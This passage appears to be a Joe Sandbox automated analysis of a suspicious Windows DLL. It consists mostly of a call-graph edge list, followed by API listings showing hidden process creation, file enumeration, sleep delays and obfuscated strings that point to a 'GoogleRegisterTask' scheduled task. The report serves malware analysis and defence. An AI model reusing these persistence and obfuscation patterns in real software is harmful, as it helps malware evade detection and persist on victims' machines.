__DllMainCRTStartup@12 15316->15311 15318 6b92160f __DllMainCRTStartup@12 SysFreeString 15317->15318 15319 6b92160d 15318->15319 15319->15316 15321 6b92cd68 15320->15321 15322 6b92cd79 15320->15322 15323 6b930431 __dosmaperr 14 API calls 15321->15323 15363 6b92cca5 15322->15363 15325 6b92cd6d 15323->15325 15326 6b92def9 ___std_exception_copy 39 API calls 15325->15326 15328 6b922032 15326->15328 15328->15052 15330 6b92d1e0 15328->15330 15329 6b930431 __dosmaperr 14 API calls 15329->15328 15331 6b92d1f3 __vfwprintf_l 15330->15331 15414 6b92cf71 15331->15414 15334 6b927d4e __vfwprintf_l 39 API calls 15335 6b92204b 15334->15335 15336 6b9281bf 15335->15336 15337 6b9281d2 __vfwprintf_l 15336->15337 15482 6b927ab3 15337->15482 15340 6b927d4e __vfwprintf_l 39 API calls 15341 6b922056 15340->15341 15342 6b92cec7 15341->15342 15343 6b92ceda __vfwprintf_l 15342->15343 15536 6b92cda2 15343->15536 15345 6b92cee6 15346 6b927d4e __vfwprintf_l 39 API calls 15345->15346 15347 6b922062 15346->15347 15347->15045 15585 6b92dbb6 15348->15585 15352 6b92cb21 __vfwprintf_l __DllMainCRTStartup@12 15351->15352 15736 6b92c7ee 15352->15736 15354 6b92cb42 15355 6b927d4e __vfwprintf_l 39 API calls 15354->15355 15356 6b92211b 15355->15356 15356->15051 15358 6b92d4f2 __vfwprintf_l 15357->15358 15838 6b92d2c1 15358->15838 15365 6b92ccb1 __FrameHandler3::FrameUnwindToState 15363->15365 15364 6b92ccb8 15366 6b930431 __dosmaperr 14 API calls 15364->15366 15365->15364 15367 6b92ccda 15365->15367 15368 6b92ccbd 15366->15368 15369 6b92ccdf 15367->15369 15370 6b92ccec 15367->15370 15371 6b92def9 ___std_exception_copy 39 API calls 15368->15371 15373 6b930431 __dosmaperr 14 API calls 15369->15373 15380 6b931e6f 15370->15380 15372 6b92ccc8 15371->15372 15372->15328 15372->15329 15373->15372 15376 6b92ccfb 15378 6b930431 __dosmaperr 14 API calls 15376->15378 15377 6b92cd08 __DllMainCRTStartup@12 15388 6b92cd44 15377->15388 15378->15372 15381 6b931e7b __FrameHandler3::FrameUnwindToState 15380->15381 15392 
6b93351f RtlEnterCriticalSection 15381->15392 15383 6b931e89 15393 6b931f13 15383->15393 15389 6b92cd48 __DllMainCRTStartup@12 15388->15389 15413 6b92cc91 RtlLeaveCriticalSection 15389->15413 15391 6b92cd59 15391->15372 15392->15383 15400 6b931f36 15393->15400 15394 6b931f8e 15395 6b931658 _unexpected 14 API calls 15394->15395 15396 6b931f97 15395->15396 15398 6b930444 __freea 14 API calls 15396->15398 15399 6b931fa0 15398->15399 15401 6b9319b1 __wsopen_s 6 API calls 15399->15401 15405 6b931e96 15399->15405 15400->15394 15400->15400 15400->15405 15409 6b92cc7d RtlEnterCriticalSection 15400->15409 15410 6b92cc91 RtlLeaveCriticalSection 15400->15410 15402 6b931fbf 15401->15402 15411 6b92cc7d RtlEnterCriticalSection 15402->15411 15406 6b931ecf 15405->15406 15412 6b933567 RtlLeaveCriticalSection 15406->15412 15408 6b92ccf5 15408->15376 15408->15377 15409->15400 15410->15400 15411->15405 15412->15408 15413->15391 15416 6b92cf7d __FrameHandler3::FrameUnwindToState 15414->15416 15415 6b92cf83 15417 6b92de7c __vfwprintf_l 29 API calls 15415->15417 15416->15415 15418 6b92cfc6 15416->15418 15419 6b92cf9e 15417->15419 15425 6b92cc7d RtlEnterCriticalSection 15418->15425 15419->15334 15421 6b92cfd2 15426 6b92d0f4 15421->15426 15423 6b92cfe8 15435 6b92d011 15423->15435 15425->15421 15427 6b92d107 15426->15427 15428 6b92d11a 15426->15428 15427->15423 15438 6b92d01b 15428->15438 15431 6b92d13d __DllMainCRTStartup@12 15434 6b92d1cb 15431->15434 15442 6b931d58 15431->15442 15434->15423 15481 6b92cc91 RtlLeaveCriticalSection 15435->15481 15437 6b92d019 15437->15419 15439 6b92d02c 15438->15439 15440 6b92d084 __DllMainCRTStartup@12 15438->15440 15439->15440 15451 6b92f0cf 15439->15451 15440->15431 15443 6b931d71 15442->15443 15447 6b92d16b 15442->15447 15443->15447 15457 6b92eea2 15443->15457 15445 6b931d8d 15464 6b932dbf 15445->15464 15448 6b92f10f 15447->15448 15475 6b92efee 15448->15475 15450 6b92f128 15450->15434 15452 6b92f0e3 __vfwprintf_l 15451->15452 15453 6b92efee 
__fread_nolock 41 API calls 15452->15453 15454 6b92f0f8 15453->15454 15455 6b927d4e __vfwprintf_l 39 API calls 15454->15455 15456 6b92f107 15455->15456 15456->15440 15458 6b92eec3 15457->15458 15459 6b92eeae 15457->15459 15458->15445 15460 6b930431 __dosmaperr 14 API calls 15459->15460 15461 6b92eeb3 15460->15461 15462 6b92def9 ___std_exception_copy 39 API calls 15461->15462 15463 6b92eebe 15462->15463 15463->15445 15466 6b932dcb __FrameHandler3::FrameUnwindToState 15464->15466 15465 6b932dd3 15465->15447 15466->15465 15467 6b932e0c 15466->15467 15469 6b932e52 15466->15469 15468 6b92de7c __vfwprintf_l 29 API calls 15467->15468 15468->15465 15470 6b935062 __wsopen_s RtlEnterCriticalSection 15469->15470 15472 6b932e58 15470->15472 15471 6b932e76 15474 6b932ec8 __wsopen_s RtlLeaveCriticalSection 15471->15474 15472->15471 15473 6b932ed0 __wsopen_s 62 API calls 15472->15473 15473->15471 15474->15465 15476 6b9352de __wsopen_s 39 API calls 15475->15476 15477 6b92f000 15476->15477 15478 6b92f01c SetFilePointerEx 15477->15478 15480 6b92f008 __wsopen_s 15477->15480 15479 6b92f034 GetLastError 15478->15479 15478->15480 15479->15480 15480->15450 15481->15437 15483 6b927abf __FrameHandler3::FrameUnwindToState 15482->15483 15484 6b927ac6 15483->15484 15485 6b927ae7 15483->15485 15487 6b92de7c __vfwprintf_l 29 API calls 15484->15487 15493 6b92cc7d RtlEnterCriticalSection 15485->15493 15489 6b927adf 15487->15489 15488 6b927af2 15494 6b927b33 15488->15494 15489->15340 15493->15488 15500 6b927b65 15494->15500 15496 6b927b01 15497 6b927b29 15496->15497 15535 6b92cc91 RtlLeaveCriticalSection 15497->15535 15499 6b927b31 15499->15489 15501 6b927b74 15500->15501 15502 6b927b9c 15500->15502 15503 6b92de7c __vfwprintf_l 29 API calls 15501->15503 15504 6b92eea2 __fread_nolock 39 API calls 15502->15504 15512 6b927b8f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15503->15512 15505 6b927ba5 15504->15505 15513 6b92f0b1 15505->15513 15508 6b927c4f 15516 6b927f55 15508->15516 15510 6b927c66 
__DllMainCRTStartup@12 15510->15512 15528 6b927d8a 15510->15528 15512->15496 15514 6b92eec9 __DllMainCRTStartup@12 43 API calls 15513->15514 15515 6b927bc3 15514->15515 15515->15508 15515->15510 15515->15512 15517 6b927f64 __wsopen_s 15516->15517 15518 6b92eea2 __fread_nolock 39 API calls 15517->15518 15520 6b927f80 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 15518->15520 15519 6b924ad5 _ValidateLocalCookies 5 API calls 15521 6b9280fe 15519->15521 15522 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15520->15522 15527 6b927f8c 15520->15527 15521->15512 15523 6b927fe0 15522->15523 15524 6b928012 ReadFile 15523->15524 15523->15527 15525 6b928039 15524->15525 15524->15527 15526 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15525->15526 15526->15527 15527->15519 15529 6b92eea2 __fread_nolock 39 API calls 15528->15529 15530 6b927d9d 15529->15530 15531 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15530->15531 15534 6b927de7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 15530->15534 15532 6b927e44 15531->15532 15533 6b92f0b1 __DllMainCRTStartup@12 43 API calls 15532->15533 15532->15534 15533->15534 15534->15512 15535->15499 15537 6b92cdae __FrameHandler3::FrameUnwindToState 15536->15537 15538 6b92cddb 15537->15538 15539 6b92cdb8 15537->15539 15541 6b92cdd3 __DllMainCRTStartup@12 15538->15541 15547 6b92cc7d RtlEnterCriticalSection 15538->15547 15540 6b92de7c __vfwprintf_l 29 API calls 15539->15540 15540->15541 15541->15345 15543 6b92cdf9 15548 6b92ce39 15543->15548 15545 6b92ce06 15562 6b92ce31 15545->15562 15547->15543 15549 6b92ce46 15548->15549 15550 6b92ce69 15548->15550 15551 6b92de7c __vfwprintf_l 29 API calls 15549->15551 15552 6b92ce61 __DllMainCRTStartup@12 15550->15552 15553 6b931d58 __vfwprintf_l 64 API calls 15550->15553 15551->15552 15552->15545 15554 6b92ce81 15553->15554 15565 6b931e2f 15554->15565 15557 6b92eea2 __fread_nolock 39 API calls 15558 6b92ce95 15557->15558 15569 6b932473 15558->15569 15561 6b930444 __freea 14 API calls 
15561->15552 15584 6b92cc91 RtlLeaveCriticalSection 15562->15584 15564 6b92ce37 15564->15541 15566 6b931e46 15565->15566 15567 6b92ce89 15565->15567 15566->15567 15568 6b930444 __freea 14 API calls 15566->15568 15567->15557 15568->15567 15570 6b92ce9c 15569->15570 15571 6b93249c 15569->15571 15570->15552 15570->15561 15572 6b9324eb 15571->15572 15574 6b9324c3 15571->15574 15573 6b92de7c __vfwprintf_l 29 API calls 15572->15573 15573->15570 15576 6b9323e2 15574->15576 15577 6b9323ee __FrameHandler3::FrameUnwindToState 15576->15577 15578 6b935062 __wsopen_s RtlEnterCriticalSection 15577->15578 15579 6b9323fc 15578->15579 15580 6b93242d 15579->15580 15581 6b932546 __wsopen_s 42 API calls 15579->15581 15582 6b932467 __DllMainCRTStartup@12 RtlLeaveCriticalSection 15580->15582 15581->15580 15583 6b932450 15582->15583 15583->15570 15584->15564 15586 6b92dbc2 __FrameHandler3::FrameUnwindToState 15585->15586 15587 6b92dbd5 __fread_nolock 15586->15587 15588 6b92dc0c 15586->15588 15597 6b92dbb1 15586->15597 15591 6b930431 __dosmaperr 14 API calls 15587->15591 15598 6b92cc7d RtlEnterCriticalSection 15588->15598 15590 6b92dc16 15599 6b92d9c0 15590->15599 15593 6b92dbef 15591->15593 15595 6b92def9 ___std_exception_copy 39 API calls 15593->15595 15595->15597 15597->15048 15598->15590 15603 6b92d9d2 __fread_nolock 15599->15603 15605 6b92d9ef 15599->15605 15600 6b92d9df 15601 6b930431 __dosmaperr 14 API calls 15600->15601 15602 6b92d9e4 15601->15602 15604 6b92def9 ___std_exception_copy 39 API calls 15602->15604 15603->15600 15603->15605 15610 6b92da30 __fread_nolock 15603->15610 15604->15605 15612 6b92dc4b 15605->15612 15606 6b92db5b __fread_nolock 15609 6b930431 __dosmaperr 14 API calls 15606->15609 15608 6b92eea2 __fread_nolock 39 API calls 15608->15610 15609->15602 15610->15605 15610->15606 15610->15608 15615 6b92dc53 15610->15615 15629 6b92fe17 15610->15629 15735 6b92cc91 RtlLeaveCriticalSection 15612->15735 15614 6b92dc51 15614->15597 15616 6b92dc64 15615->15616 15620 6b92dc60 
__fread_nolock 15615->15620 15617 6b92dc6b 15616->15617 15621 6b92dc7e __fread_nolock 15616->15621 15618 6b930431 __dosmaperr 14 API calls 15617->15618 15619 6b92dc70 15618->15619 15622 6b92def9 ___std_exception_copy 39 API calls 15619->15622 15620->15610 15621->15620 15623 6b92dcb5 15621->15623 15624 6b92dcac 15621->15624 15622->15620 15623->15620 15627 6b930431 __dosmaperr 14 API calls 15623->15627 15625 6b930431 __dosmaperr 14 API calls 15624->15625 15626 6b92dcb1 15625->15626 15628 6b92def9 ___std_exception_copy 39 API calls 15626->15628 15627->15626 15628->15620 15630 6b92fe41 15629->15630 15631 6b92fe29 15629->15631 15633 6b930183 15630->15633 15638 6b92fe84 15630->15638 15692 6b93041e 15631->15692 15635 6b93041e __dosmaperr 14 API calls 15633->15635 15637 6b930188 15635->15637 15636 6b930431 __dosmaperr 14 API calls 15639 6b92fe36 15636->15639 15640 6b930431 __dosmaperr 14 API calls 15637->15640 15638->15639 15641 6b92fe8f 15638->15641 15646 6b92febf 15638->15646 15639->15610 15642 6b92fe9c 15640->15642 15643 6b93041e __dosmaperr 14 API calls 15641->15643 15647 6b92def9 ___std_exception_copy 39 API calls 15642->15647 15644 6b92fe94 15643->15644 15645 6b930431 __dosmaperr 14 API calls 15644->15645 15645->15642 15648 6b92fed8 15646->15648 15649 6b92ff13 15646->15649 15650 6b92fee5 15646->15650 15647->15639 15648->15650 15682 6b92ff01 15648->15682 15695 6b93047e 15649->15695 15651 6b93041e __dosmaperr 14 API calls 15650->15651 15653 6b92feea 15651->15653 15655 6b930431 __dosmaperr 14 API calls 15653->15655 15658 6b92fef1 15655->15658 15657 6b930444 __freea 14 API calls 15660 6b92ff2d 15657->15660 15661 6b92def9 ___std_exception_copy 39 API calls 15658->15661 15659 6b93005f 15662 6b9300d3 15659->15662 15663 6b930078 GetConsoleMode 15659->15663 15664 6b930444 __freea 14 API calls 15660->15664 15691 6b92fefc __fread_nolock 15661->15691 15665 6b9300d7 ReadFile 15662->15665 15663->15662 15666 6b930089 15663->15666 15667 6b92ff34 15664->15667 15668 6b93014b 
GetLastError 15665->15668 15669 6b9300ef 15665->15669 15666->15665 15670 6b93008f ReadConsoleW 15666->15670 15671 6b92ff59 15667->15671 15672 6b92ff3e 15667->15672 15673 6b930158 15668->15673 15677 6b9300af 15668->15677 15669->15668 15676 6b9300c8 15669->15676 15675 6b9300a9 GetLastError 15670->15675 15670->15676 15674 6b92f0cf __fread_nolock 41 API calls 15671->15674 15679 6b930431 __dosmaperr 14 API calls 15672->15679 15680 6b930431 __dosmaperr 14 API calls 15673->15680 15674->15682 15675->15677 15686 6b930114 15676->15686 15687 6b93012b 15676->15687 15676->15691 15677->15691 15711 6b9303d7 15677->15711 15678 6b930444 __freea 14 API calls 15678->15639 15684 6b92ff43 15679->15684 15681 6b93015d 15680->15681 15685 6b93041e __dosmaperr 14 API calls 15681->15685 15702 6b935a73 15682->15702 15688 6b93041e __dosmaperr 14 API calls 15684->15688 15685->15691 15716 6b92fb29 15686->15716 15687->15691 15729 6b92f96f 15687->15729 15688->15691 15691->15678 15693 6b92f5e8 __dosmaperr 14 API calls 15692->15693 15694 6b92fe2e 15693->15694 15694->15636 15696 6b9304bc 15695->15696 15701 6b93048c _unexpected 15695->15701 15698 6b930431 __dosmaperr 14 API calls 15696->15698 15697 6b9304a7 RtlAllocateHeap 15699 6b92ff24 15697->15699 15697->15701 15698->15699 15699->15657 15700 6b92df8f _unexpected RtlEnterCriticalSection RtlLeaveCriticalSection 15700->15701 15701->15696 15701->15697 15701->15700 15703 6b935a80 15702->15703 15704 6b935a8d 15702->15704 15705 6b930431 __dosmaperr 14 API calls 15703->15705 15706 6b935a99 15704->15706 15707 6b930431 __dosmaperr 14 API calls 15704->15707 15708 6b935a85 15705->15708 15706->15659 15709 6b935aba 15707->15709 15708->15659 15710 6b92def9 ___std_exception_copy 39 API calls 15709->15710 15710->15708 15712 6b93041e __dosmaperr 14 API calls 15711->15712 15713 6b9303e2 __dosmaperr 15712->15713 15714 6b930431 __dosmaperr 14 API calls 15713->15714 15715 6b9303f5 15714->15715 15715->15691 15717 6b92f822 __fread_nolock 42 API calls 15716->15717 15719 
6b92fb40 15717->15719 15718 6b93488b __fread_nolock MultiByteToWideChar 15720 6b92fc3d 15718->15720 15721 6b92fbcb 15719->15721 15722 6b92fbbb 15719->15722 15726 6b92fb71 15719->15726 15727 6b92fb85 15719->15727 15723 6b92fc46 GetLastError 15720->15723 15720->15726 15721->15727 15728 6b92f0cf __fread_nolock 41 API calls 15721->15728 15724 6b930431 __dosmaperr 14 API calls 15722->15724 15725 6b9303d7 __dosmaperr 14 API calls 15723->15725 15724->15726 15725->15726 15726->15691 15727->15718 15728->15727 15730 6b92f9a9 15729->15730 15731 6b92fa3f ReadFile 15730->15731 15732 6b92fa3a 15730->15732 15731->15732 15733 6b92fa5c 15731->15733 15732->15691 15733->15732 15734 6b92f0cf __fread_nolock 41 API calls 15733->15734 15734->15732 15735->15614 15752 6b92c37b 15736->15752 15738 6b92c849 15741 6b92c86e 15738->15741 15743 6b92c320 __vfwprintf_l 39 API calls 15738->15743 15739 6b92c801 15739->15738 15740 6b92c816 15739->15740 15751 6b92c831 __DllMainCRTStartup@12 15739->15751 15742 6b92de7c __vfwprintf_l 29 API calls 15740->15742 15759 6b92cab6 15741->15759 15742->15751 15743->15741 15745 6b92cab6 __DllMainCRTStartup@12 42 API calls 15746 6b92c883 15745->15746 15746->15745 15747 6b92c8ac 15746->15747 15750 6b92c937 __aulldiv __DllMainCRTStartup@12 15747->15750 15766 6b92c2c5 15747->15766 15749 6b92c2c5 __vfwprintf_l 39 API calls 15749->15751 15750->15749 15751->15354 15753 6b92c393 15752->15753 15754 6b92c380 15752->15754 15753->15739 15755 6b930431 __dosmaperr 14 API calls 15754->15755 15756 6b92c385 15755->15756 15757 6b92def9 ___std_exception_copy 39 API calls 15756->15757 15758 6b92c390 15757->15758 15758->15739 15760 6b92cac2 15759->15760 15762 6b92cad8 15759->15762 15772 6b9314e7 15760->15772 15763 6b92cae8 15762->15763 15777 6b93158d 15762->15777 15763->15746 15764 6b92cacd __vfwprintf_l 15764->15746 15767 6b92c2d6 15766->15767 15768 6b92c2ea 15766->15768 15767->15768 15769 6b930431 __dosmaperr 14 API calls 15767->15769 15768->15750 15770 6b92c2df 15769->15770 15771 
6b92def9 ___std_exception_copy 39 API calls 15770->15771 15771->15768 15784 6b92f497 GetLastError 15772->15784 15815 6b93150b 15777->15815 15781 6b924ad5 _ValidateLocalCookies 5 API calls 15782 6b931656 15781->15782 15782->15763 15783 6b9315ba 15783->15781 15785 6b92f4b3 15784->15785 15786 6b92f4ad 15784->15786 15788 6b93196f _unexpected 6 API calls 15785->15788 15790 6b92f4b7 SetLastError 15785->15790 15787 6b931930 _unexpected 6 API calls 15786->15787 15787->15785 15789 6b92f4cf 15788->15789 15789->15790 15792 6b931658 _unexpected 14 API calls 15789->15792 15794 6b92f547 15790->15794 15795 6b92f54c 15790->15795 15793 6b92f4e4 15792->15793 15796 6b92f4ec 15793->15796 15797 6b92f4fd 15793->15797 15811 6b9304cc 15794->15811 15798 6b92ed44 __FrameHandler3::FrameUnwindToState 37 API calls 15795->15798 15799 6b93196f _unexpected 6 API calls 15796->15799 15800 6b93196f _unexpected 6 API calls 15797->15800 15801 6b92f551 15798->15801 15802 6b92f4fa 15799->15802 15803 6b92f509 15800->15803 15808 6b930444 __freea 14 API calls 15802->15808 15804 6b92f524 15803->15804 15805 6b92f50d 15803->15805 15806 6b92f299 _unexpected 14 API calls 15804->15806 15807 6b93196f _unexpected 6 API calls 15805->15807 15809 6b92f52f 15806->15809 15807->15802 15808->15790 15810 6b930444 __freea 14 API calls 15809->15810 15810->15790 15812 6b9304df 15811->15812 15814 6b9304f4 15811->15814 15813 6b935611 __vfwprintf_l 39 API calls 15812->15813 15812->15814 15813->15814 15814->15764 15816 6b931529 15815->15816 15822 6b931522 15815->15822 15817 6b92f497 _unexpected 39 API calls 15816->15817 15816->15822 15818 6b93154a 15817->15818 15819 6b9304cc __DllMainCRTStartup@12 39 API calls 15818->15819 15820 6b931560 15819->15820 15821 6b93052a __DllMainCRTStartup@12 39 API calls 15820->15821 15821->15822 15822->15783 15823 6b935952 15822->15823 15824 6b93150b __DllMainCRTStartup@12 39 API calls 15823->15824 15825 6b935972 15824->15825 15826 6b93488b __fread_nolock MultiByteToWideChar 15825->15826 15829 
6b93599f 15826->15829 15827 6b935a2e 15830 6b924ad5 _ValidateLocalCookies 5 API calls 15827->15830 15828 6b935a26 15831 6b935a53 __freea 14 API calls 15828->15831 15829->15827 15829->15828 15832 6b93047e __fread_nolock 15 API calls 15829->15832 15834 6b9359c4 __fread_nolock __alloca_probe_16 15829->15834 15833 6b935a51 15830->15833 15831->15827 15832->15834 15833->15783 15834->15828 15835 6b93488b __fread_nolock MultiByteToWideChar 15834->15835 15836 6b935a0d 15835->15836 15836->15828 15837 6b935a14 GetStringTypeW 15836->15837 15837->15828 15886->14496 15888 6b92eb29 __EH_prolog3 15887->15888 15902 6b92e9e8 15888->15902 15890 6b92eb50 __DllMainCRTStartup@12 15890->14341 15892 6b92e333 15891->15892 15893 6b92e344 15891->15893 15919 6b92e3ce GetModuleHandleW 15892->15919 15926 6b92e1d1 15893->15926 15898 6b92e382 15898->13788 15903 6b92e9f4 __FrameHandler3::FrameUnwindToState 15902->15903 15910 6b93351f RtlEnterCriticalSection 15903->15910 15905 6b92ea02 15911 6b92ea43 15905->15911 15910->15905 15912 6b92ea0f 15911->15912 15913 6b92ea62 15911->15913 15915 6b92ea37 15912->15915 15913->15912 15914 6b930444 __freea 14 API calls 15913->15914 15914->15912 15918 6b933567 RtlLeaveCriticalSection 15915->15918 15917 6b92ea20 15917->15890 15918->15917 15920 6b92e338 15919->15920 15920->15893 15921 6b92e429 GetModuleHandleExW 15920->15921 15922 6b92e468 GetProcAddress 15921->15922 15923 6b92e47c 15921->15923 15922->15923 15924 6b92e498 15923->15924 15925 6b92e48f FreeLibrary 15923->15925 15924->15893 15925->15924 15927 6b92e1dd __FrameHandler3::FrameUnwindToState 15926->15927 15941 6b93351f RtlEnterCriticalSection 15927->15941 15929 6b92e1e7 15942 6b92e21e 15929->15942 15931 6b92e1f4 15946 6b92e212 15931->15946 15934 6b92e39d 15950 6b92e410 15934->15950 15936 6b92e3a7 15937 6b92e3bb 15936->15937 15938 6b92e3ab GetCurrentProcess TerminateProcess 15936->15938 15939 6b92e429 __FrameHandler3::FrameUnwindToState 3 API calls 15937->15939 15938->15937 15940 6b92e3c3 ExitProcess 
15939->15940 15941->15929 15943 6b92e22a __FrameHandler3::FrameUnwindToState 15942->15943 15944 6b92eb1d __DllMainCRTStartup@12 14 API calls 15943->15944 15945 6b92e28e __FrameHandler3::FrameUnwindToState 15943->15945 15944->15945 15945->15931 15949 6b933567 RtlLeaveCriticalSection 15946->15949 15948 6b92e200 15948->15898 15948->15934 15949->15948 15953 6b9335a3 15950->15953 15952 6b92e415 __FrameHandler3::FrameUnwindToState 15952->15936 15954 6b9335b2 __FrameHandler3::FrameUnwindToState 15953->15954 15955 6b9335bf 15954->15955 15957 6b931853 15954->15957 15955->15952 15958 6b9317ce _unexpected 5 API calls 15957->15958 15959 6b93186f 15958->15959 15959->15955 15961 6b9266ea 15960->15961 15962 6b9250eb 15960->15962 15961->15962 15963 6b92d5ab ___std_exception_copy 14 API calls 15961->15963 15962->13790 15963->15961 15965 6b92ece3 ___scrt_uninitialize_crt 15964->15965 15966 6b92ecd1 15964->15966 15965->14353 15967 6b92ecdf 15966->15967 15969 6b931e26 15966->15969 15967->14353 15972 6b931cb7 15969->15972 15975 6b931c0b 15972->15975 15976 6b931c17 __FrameHandler3::FrameUnwindToState 15975->15976 15983 6b93351f RtlEnterCriticalSection 15976->15983 15978 6b931c8d 15992 6b931cab 15978->15992 15979 6b931c21 ___scrt_uninitialize_crt 15979->15978 15984 6b931b7f 15979->15984 15983->15979 15985 6b931b8b __FrameHandler3::FrameUnwindToState 15984->15985 15995 6b92cc7d RtlEnterCriticalSection 15985->15995 15987 6b931b95 ___scrt_uninitialize_crt 15991 6b931bce 15987->15991 15996 6b931dc1 15987->15996 16009 6b931bff 15991->16009 16037 6b933567 RtlLeaveCriticalSection 15992->16037 15994 6b931c99 15994->15967 15995->15987 15997 6b931dd6 __vfwprintf_l 15996->15997 15998 6b931de8 15997->15998 15999 6b931ddd 15997->15999 16001 6b931d58 __vfwprintf_l 64 API calls 15998->16001 16000 6b931cb7 ___scrt_uninitialize_crt 68 API calls 15999->16000 16002 6b931de3 16000->16002 16003 6b931df2 16001->16003 16004 6b927d4e __vfwprintf_l 39 API calls 16002->16004 16003->16002 16006 6b92eea2 
Control-flow graph edge list (rendered graph not reproduced). The nodes in this part of the graph are CRT helpers (__fread_nolock, __dosmaperr, __freea, __vfwprintf_l, _unexpected, ___std_exception_copy, __DllMainCRTStartup@12, __FrameHandler3::FrameUnwindToState, _ValidateLocalCookies) and the Windows APIs they reach are RtlEnterCriticalSection, RtlLeaveCriticalSection, FlushFileBuffers, GetLastError, TlsFree, GetEnvironmentStringsW, FreeEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetOEMCP, GetACP, IsValidCodePage, GetCPInfo and LCMapStringW, i.e. standard C runtime locale, environment and stdio initialisation rather than sample-specific logic.

                Control-flow Graph

                APIs
                • FindFirstFileW.KERNELBASE(?,?,?,?,?,FB32F76A), ref: 6B921C0B
                • _strlen.LIBCMT ref: 6B921D30
                • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6B921D9D
                • FindNextFileW.KERNELBASE(?,?,?,?,?,FB32F76A), ref: 6B921FAC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
                • API ID: FileFind$EnvironmentExpandFirstNextStrings_strlen
                • String ID: %s\%s$%s\%s$%s\%s$%s\*.*$-a $GoogleRegisterTask$IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7BbtB>$PT30S$s`bovb-f{f
                • API String ID: 4146766196-3364674013
                • Opcode ID: 3a4bdf3f3fb1ad213e23c14635e596be27db2fd0df00700b48f7b024f46defc4
                • Instruction ID: 1c06049022173fae5acd135399feb2e4b365ed823bab053bdd85251b73887f1d
                • Opcode Fuzzy Hash: 3a4bdf3f3fb1ad213e23c14635e596be27db2fd0df00700b48f7b024f46defc4
                • Instruction Fuzzy Hash: D5C1AD71C24259ABDF20EFA4CD4ABED3BB8BF06708F604465F904DA185EB39CA54CB51

                Control-flow Graph

                APIs
                  • Part of subcall function 6B92171F: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6B92175A
                  • Part of subcall function 6B92171F: _strlen.LIBCMT ref: 6B92177C
                  • Part of subcall function 6B92171F: GetProcAddress.KERNEL32(?), ref: 6B9217E2
                  • Part of subcall function 6B92171F: _strlen.LIBCMT ref: 6B92180D
                • _strlen.LIBCMT ref: 6B924460
                • GetEnvironmentVariableW.KERNEL32(?,?,00000032), ref: 6B9244CA
                • _strlen.LIBCMT ref: 6B9244F0
                • _strlen.LIBCMT ref: 6B924571
                • _strlen.LIBCMT ref: 6B9245E8
                  • Part of subcall function 6B92192F: _strlen.LIBCMT ref: 6B9219BD
                  • Part of subcall function 6B92192F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6B9474C4), ref: 6B921A5E
                • Sleep.KERNELBASE(000005DC), ref: 6B924654
                • Sleep.KERNELBASE(00007530), ref: 6B92465F
                • _strlen.LIBCMT ref: 6B924685
                • _strlen.LIBCMT ref: 6B924706
                  • Part of subcall function 6B921B85: FindFirstFileW.KERNELBASE(?,?,?,?,?,FB32F76A), ref: 6B921C0B
                Strings
                • %s%s, xrefs: 6B9246C4
                • %s%s, xrefs: 6B92452F
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6B9246E6
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6B9245C8
                • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6B924440
                • %s%s, xrefs: 6B924745
                • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6B924665
                • VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>, xrefs: 6B924551
                • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB, xrefs: 6B9244D0
                Memory Dump Source
                • Source File: 00000000.00000002.2078908385.000000006B921000.00000020.00000001.01000000.00000003.sdmp, Offset: 6B920000, based on PE: true
                • Associated: 00000000.00000002.2078893804.000000006B920000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078928333.000000006B93D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078945156.000000006B946000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.2078960672.000000006B948000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6b920000_loaddll32.jbxd
                Similarity
